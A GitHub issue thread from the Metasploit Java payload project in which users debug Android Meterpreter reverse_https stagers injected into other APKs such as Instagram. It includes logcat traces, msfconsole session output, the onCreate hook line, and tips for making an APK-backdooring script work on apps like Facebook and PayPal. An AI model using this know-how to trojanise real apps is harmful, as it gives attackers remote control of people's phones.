### ISSUE TITLE
Android Meterpreter Reverse HTTPS failure

### ISSUE THREAD

**Issue by Jack64** [rapid7/metasploit-javapayload#41]
I've been using the android stager files Payload.java and PayloadTrustManager.java to "patch" other apps (then hooking onCreate() with `Payload.startInPath(getApplicationContext().getFilesDir().toString());` ) and it's working using reverse_tcp, but now I'm trying to use reverse_https and I'm getting an error: ` java.lang.ClassNotFoundException: com.metasploit.stage.PayloadTrustManager at Payload.loadStage(Payload.java:146) `, so I'm guessing it's failing because it's trying to use the PTM that's usually inside the generated apk, but since I'm not using the generated apk but adding the stager java files to another apk manually, I don't suppose there's a way I can tell meterpreter to look for that class inside an arbitrary package? For the stager, I changed the package name on both Payload.java and PayloadTrustManager.java so that the `Payload.startInPath(getApplicationContext().getFilesDir().toString());` hook worked, perhaps this must be done on the stage side as well.
Here's some more logcat stuff:
```
Caused by: java.lang.ClassNotFoundException: Didn't find class com.metasploit.stage.PayloadTrustManager" on path: DexPathList[[zip file  "/data/data/com.instagram.android/files/met.jar"],nativeLibraryDirectories=/data/data/com.instagram.android/files, /vendor/lib, /system/lib]]
```
I tried to trace the rest of the logcat errors and ended up on https://github.com/rapid7/metasploit-javapayload/blob/master/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java at line 196:
```
Class.forName(getPayloadTrustManager()).getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
```
where getPayloadTrustManager() is defined as:
```
protected String getPayloadTrustManager() {
        return "com.metasploit.meterpreter.PayloadTrustManager";
    }
```
maybe that's the problem.
My test phone is a Samsung Galaxy S4 (i9505), OS: Android 5.0.1 - Linux 3.4.0-4760392 (armv7l) and my metasploit framework is the latest GIT version .
I've also been getting `Failed to load extension: No module of the name ext_server_android.jar found` even with the msfvenom generated APKs, but that's another issue altogether.

If there's any other information you'd like me to provide regarding this issue please let me know.

Thanks and keep up the great work !

**Comment by frenchbeard** [comment]
Hey Jack, I would say that you have the answer in your question : since you modified the package in which the PayloadTrustManager is, any reflection call (typically the Class.forName example you provided) cannot find anything that corresponds. Since the actual meterpreter is retrieved from the server you setup in Metasploit itself, unless you provide a different meterpreter with the correct path towards the PayloadTrustManager, as follows :
```
return "correct.package.hierarchy.PayloadTrustManager";
```
I have no idea whether or not this would work, but have you tried putting both the modified and unmodified versions of the files in the apk when you patch it ? I know, dirty hack, but since they would be in different packages, there should not be any conflict between them, and they would be accessible to the call on the default path.

Hope that was of any help

**Comment by Jack64** [comment]
Hey, thanks for your input.
I'll definitely try that out, however, I'm using my own modified version of the Smartphone-Pentest-Framework to do the patching, which basically injects the original APK inside an Agent APK (com.bulbsecurity.framework) that serves as a loader for the original. It's actually backdooring the backdoor with the original, if that makes any sense.
 The `Payload.startInPath(getApplicationContext().getFilesDir().toString());` is then added as a command I can send to the victim, and Payload.java / PayloadTrustManager.java belong to com.bulbsecurity.framework.
If I didn't add those files to the package, it wouldn't even load the stage, however if I do that, then it's the stage that fails.
The problem with your approach, if I understand it correctly, is that the meterpreter stage isn't compiled when you setup the handler, msf just replaces some hardcoded strings like LHOST and LPORT and ships it out in a way that DexClassLoader can load it (classes.dex/classes.jar), so I'd have to rebuild the meterpreter with the correct string (I'm assuming it'd be `return "com.bulbsecurity.framework.PayloadTrustManager";` , a file that does exist on the package and works fine for the stager) and replace the classes.dex/classes.jar with my own modified version in metasploit.
I just think it'd be easier if the stage didn't rely on the stager's PayloadTrustManager and loaded it's own, especially with the upcoming work on meterpreter injection in arbitrary APKs.

**Comment by timwr** [comment]
It looks live you've patched the payload to work from a different package name, but the meterpreter stage is still relying on it being at com.metasploit.stage.
The easiest workaround is to just include the files inside the apk in the correct locations (com.metasploit.stage.Payload and com.metasploit.stage.PayloadTrustManager).
If that's not possible I can work on making the meterpreter stage include and use it's own PayloadTrustManager.

**Comment by Jack64** [comment]
@timwr It may be possible to include the files in the correct locations, I just have to modify the scripted patching process. You should decide what the best method is, but IMHO if the stage has its own PayloadTrustManager it'll save you some headaches later when building the APK patching process.

**Comment by Jack64** [comment]
@timwr Just confirmed that placing the files in the correct locations works, certificate hash checking and everything. Thanks for the tip !
I am still getting these, though, no idea why:
```
W/System.err(21661): Unknown request detected:
W/System.err(21661): 	TLV_TYPE_METHOD = core_machine_id
W/System.err(21661): 	TLV_TYPE_REQUEST_ID = 83450483114795139779530470757789
W/System.err(21661): Unknown request detected:
W/System.err(21661): 	TLV_TYPE_METHOD = core_enumextcmd
W/System.err(21661): 	TLV_TYPE_REQUEST_ID = 30161616399353254958736142206508
W/System.err(21661): 	TLV_TYPE_STRING = stdapi
W/System.err(21661): Unknown request detected:
W/System.err(21661): 	TLV_TYPE_METHOD = core_enumextcmd
W/System.err(21661): 	TLV_TYPE_REQUEST_ID = 65176552167640380276130880526416
W/System.err(21661): 	TLV_TYPE_STRING = android
```
The meterpreter works as expected, aside from loading the android extension.
If there's anything I can help with, testing or whatnot, hit me up here or on IRC I'll be glad to help.

**Comment by Jack64** [comment]
Interesting, it works on the kali metasploit version I ran in my VirtualBox VM but not on the bleeding edge GIT version in my Raspberry Pi 2.. on the GIT version it's still throwing the error above.

**Comment by Jack64** [comment]
@timwr Hey, my meterpreter isn't loading on a Tablet, ASUS MeMO Pad HD 7 (ME173X) running 4.2.2, here's the logcat:

```
D/NativeCrypto(10378): Doing SSL_Read() ssl=0x55e89ff8, appData=0x5449fb68
D/NativeCrypto(10378): Returned from SSL_Read() with result 1787, error code 0 ssl=0x55e89ff8, appData=0x5449fb68
D/dalvikvm(10378): open_cached_dex_file : /data/data/com.antivirus/files/payload.jar /data/data/com.antivirus/files/payload.dex
D/dalvikvm(10378): DexOpt: --- BEGIN 'payload.jar' (bootstrap=0) ---
D/dalvikvm(10378): DexOpt: --- END 'payload.jar' (success) ---
D/dalvikvm(10378): DEX prep '/data/data/com.antivirus/files/payload.jar': unzip in 0ms, rewrite 102ms
D/NativeCrypto(10378): ssl=0x55e89ff8 sslRead buf=0x418b72e8 len=4,timeo=0
D/NativeCrypto(10378): Doing SSL_Read() ssl=0x55e89ff8, appData=0x5449fb68
D/NativeCrypto(10378): Returned from SSL_Read() with result 4, error code 0 ssl=0x55e89ff8, appData=0x5449fb68
D/NativeCrypto(10378): ssl=0x55e89ff8 sslRead buf=0x419a6440 len=42817,timeo=0
D/NativeCrypto(10378): Doing SSL_Read() ssl=0x55e89ff8, appData=0x5449fb68
D/NativeCrypto(10378): Returned from SSL_Read() with result 14471, error code 0 ssl=0x55e89ff8, appData=0x5449fb68
D/NativeCrypto(10378): ssl=0x55e89ff8 sslRead buf=0x419a9cc7 len=28346,timeo=0
D/NativeCrypto(10378): Doing SSL_Read() ssl=0x55e89ff8, appData=0x5449fb68
D/NativeCrypto(10378): Returned from SSL_Read() with result 16384, error code 0 ssl=0x55e89ff8, appData=0x5449fb68
D/NativeCrypto(10378): ssl=0x55e89ff8 sslRead buf=0x419adcc7 len=11962,timeo=0
D/NativeCrypto(10378): Doing SSL_Read() ssl=0x55e89ff8, appData=0x5449fb68
D/NativeCrypto(10378): Returned from SSL_Read() with result 11962, error code 0 ssl=0x55e89ff8, appData=0x5449fb68
D/dalvikvm(10378): open_cached_dex_file : /data/data/com.antivirus/files/met.jar /data/data/com.antivirus/files/met.dex
D/dalvikvm(10378): DexOpt: --- BEGIN 'met.jar' (bootstrap=0) ---
D/dalvikvm(10378): DexOpt: --- END 'met.jar' (success) ---
D/dalvikvm(10378): DEX prep '/data/data/com.antivirus/files/met.jar': unzip in 2ms, rewrite 146ms
W/System.err(10378): android.os.NetworkOnMainThreadException
D/dalvikvm(10378): threadid=25: exiting
D/dalvikvm(10378): threadid=25: bye!
W/System.err(10378): android.os.NetworkOnMainThreadException
W/System.err(10378): 	at android.os.StrictMode$AndroidBlockGuardPolicy.onNetwork(StrictMode.java:1128)
W/System.err(10378): 	at org.apache.harmony.xnet.provider.jsse.OpenSSLSocketImpl$SSLInputStream.read(OpenSSLSocketImpl.java:655)
W/System.err(10378): 	at libcore.net.http.FixedLengthInputStream.read(FixedLengthInputStream.java:45)
W/System.err(10378): 	at libcore.io.Streams.readFully(Streams.java:81)
W/System.err(10378): 	at java.io.DataInputStream.readInt(DataInputStream.java:124)
W/System.err(10378): 	at com.metasploit.meterpreter.Meterpreter.startExecuting(Unknown Source)
W/System.err(10378): 	at com.metasploit.meterpreter.AndroidMeterpreter$1.run(AndroidMeterpreter.java:67)
W/System.err(10378): 	at android.os.Handler.handleCallback(Handler.java:725)
W/System.err(10378): 	at android.os.Handler.dispatchMessage(Handler.java:92)
W/System.err(10378): 	at android.os.Looper.loop(Looper.java:153)
W/System.err(10378): 	at android.app.ActivityThread.main(ActivityThread.java:5299)
W/System.err(10378): 	at java.lang.reflect.Method.invokeNative(Native Method)
W/System.err(10378): 	at java.lang.reflect.Method.invoke(Method.java:511)
W/System.err(10378): 	at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:833)
W/System.err(10378): 	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:600)
W/System.err(10378): 	at dalvik.system.NativeStart.main(Native Method)
```

here's what msfconsole says:

```
[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[*] Starting the payload handler...
[*] 192.168.1.99:49838 (UUID: 3c7d9b83ca5b2fbe/dalvik=19/android=3/2015-06-17T23:24:25Z) Staging Java payload ...
[*] Meterpreter session 8 opened (192.168.1.72:8443 -> 192.168.1.99:49838) at 2015-06-18 00:24:26 +0100

meterpreter > 
[-] Meterpreter session 8 is not valid and will be closed
[*] 192.168.1.99 - Meterpreter session 8 closed.
```

It's a related error because I'm still using the successful injection I performed earlier, just testing different devices to check stability.
Googling the error led me to http://stackoverflow.com/questions/19941703/android-os-networkonmainthreadexception-at-android-os-strictmodeandroidblockgua and http://stackoverflow.com/questions/17918557/android-os-networkonmainthreadexception
which seems to indicate the networking is not being handled in a background thread but on the UI thread.
Now I'm not sure if this is related to the injection part or the meterpreter part, it's weird that it works on some devices but not on this tablet..

**Comment by timwr** [comment]
Does a clean version of meterpreter work on that tablet?
I'm not sure how execution could end up on the main thread, unless something went wrong during injection. Are you calling Payload.main instead of Payload.startInPath/startAsync? Have you checked out the latest javapayload code (AndroidMeterpreter.java line 67 no longer calls startExecuting)
Also I'd love some feedback on:
https://github.com/timwr/metasploit-framework/blob/apk_backdoor/tools/apk_backdoor.rb as it looks related.

**Comment by Jack64** [comment]
Hey @timwr .
It may have been an injection issue, I'm calling it with 
```
Payload.startInPath(getApplicationContext().getFilesDir().toString());
```
but I'll have to test with a clean meterpreter and debug that later, I don't have that tablet on me at the moment, but it may still have an old injection that's failing for some reason.
At first glance the apk_backdoor.rb looks good, it's VERY similar to what I'm doing right now . I'm looking forward to playing with it when I have time, but a good couple of apps to test are Facebook and Paypal, usually if it works for those, it'll work for anything else.

**Comment by Jack64** [comment]
@timwr
I've been looking at https://github.com/timwr/metasploit-framework/blob/apk_backdoor/tools/apk_backdoor.rb and I've noticed you're scanning the manifest looking for
```
android.intent.category.LAUNCHER
```
and that will fail for some apps, you will need to look for
```
android.intent.action.MAIN
```
as well if the former is not present. That should increase the number of apks you can backdoor without any other change to the process.
There may be other relevant strings too, and I still haven't been able to backdoor `com.facebook.katana.apk` so if you want something that works reliably you should use that app for testing.

**Comment by amainyebriggs** [comment]
apk_backdoor shows 

apk_bacdoor.rb:203:in `initialize': No such file or directory @ rb_sysopen - /tmp/d20150925-15164-pcp52a/original/AndroidManifest.xml (Errno::ENOENT)
	from apk_bacdoor.rb:203:in `open'
	from apk_bacdoor.rb:203:in `<main>'

**Comment by Jack64** [comment]
Could you please check if apktool is properly decompiling the original application and its manifest is present?

**Comment by amainyebriggs** [comment]
it decomplles properly and also compiles properly but backdoored apk does not install on android 4.4,5.0 etc have not tried it on other versions

**Comment by Jack64** [comment]
If you decompile and then recompile without backdooring can you install the rebuilt apk? If so, then the issue is with the apk_backdoor script, otherwise it may be apktool's problem, it happens with some apps. You should try to use the script with another app to make sure it's working properly. If you can't install the rebuilt apk you should open an issue on the apktool project and report it.

**Comment by timwr** [comment]
Weird I'm having problems with apktool and payloads from msfvenom in the latest metasploit-framework, e.g:
This didn't seem to occur before so I'll try see what's changed.
```
apktool d payload.apk 
I: Using Apktool 2.0.0 on payload.apk
I: Loading resource table...
Exception in thread "main" brut.androlib.AndrolibException: Could not decode arsc file
	at brut.androlib.res.decoder.ARSCDecoder.decode(ARSCDecoder.java:52)
	at brut.androlib.res.AndrolibResources.getResPackagesFromApk(AndrolibResources.java:538)
	at brut.androlib.res.AndrolibResources.loadMainPkg(AndrolibResources.java:63)
	at brut.androlib.res.AndrolibResources.getResTable(AndrolibResources.java:55)
	at brut.androlib.Androlib.getResTable(Androlib.java:64)
	at brut.androlib.ApkDecoder.setTargetSdkVersion(ApkDecoder.java:209)
	at brut.androlib.ApkDecoder.decode(ApkDecoder.java:92)
	at brut.apktool.Main.cmdDecode(Main.java:165)
	at brut.apktool.Main.main(Main.java:81)
Caused by: java.io.IOException: Expected: 0x00000008, got: 0x00000000
	at brut.util.ExtDataInput.skipCheckShort(ExtDataInput.java:56)
	at brut.androlib.res.decoder.ARSCDecoder.readValue(ARSCDecoder.java:238)
	at brut.androlib.res.decoder.ARSCDecoder.readEntry(ARSCDecoder.java:201)
	at brut.androlib.res.decoder.ARSCDecoder.readConfig(ARSCDecoder.java:189)
	at brut.androlib.res.decoder.ARSCDecoder.readType(ARSCDecoder.java:157)
	at brut.androlib.res.decoder.ARSCDecoder.readPackage(ARSCDecoder.java:114)
	at brut.androlib.res.decoder.ARSCDecoder.readTable(ARSCDecoder.java:78)
	at brut.androlib.res.decoder.ARSCDecoder.decode(ARSCDecoder.java:47)
	... 8 more
```

**Comment by timwr** [comment]
Sorry to be pedantic, this repository is deprecated.
Let's continue the discussion here:
https://github.com/rapid7/metasploit-framework/pull/5932

**Comment by amainyebriggs** [comment]
its certification issues

**Comment by amainyebriggs** [comment]
after a success ful build the manifst mf in not there
that a certification problem 
but jarsigner fixed it
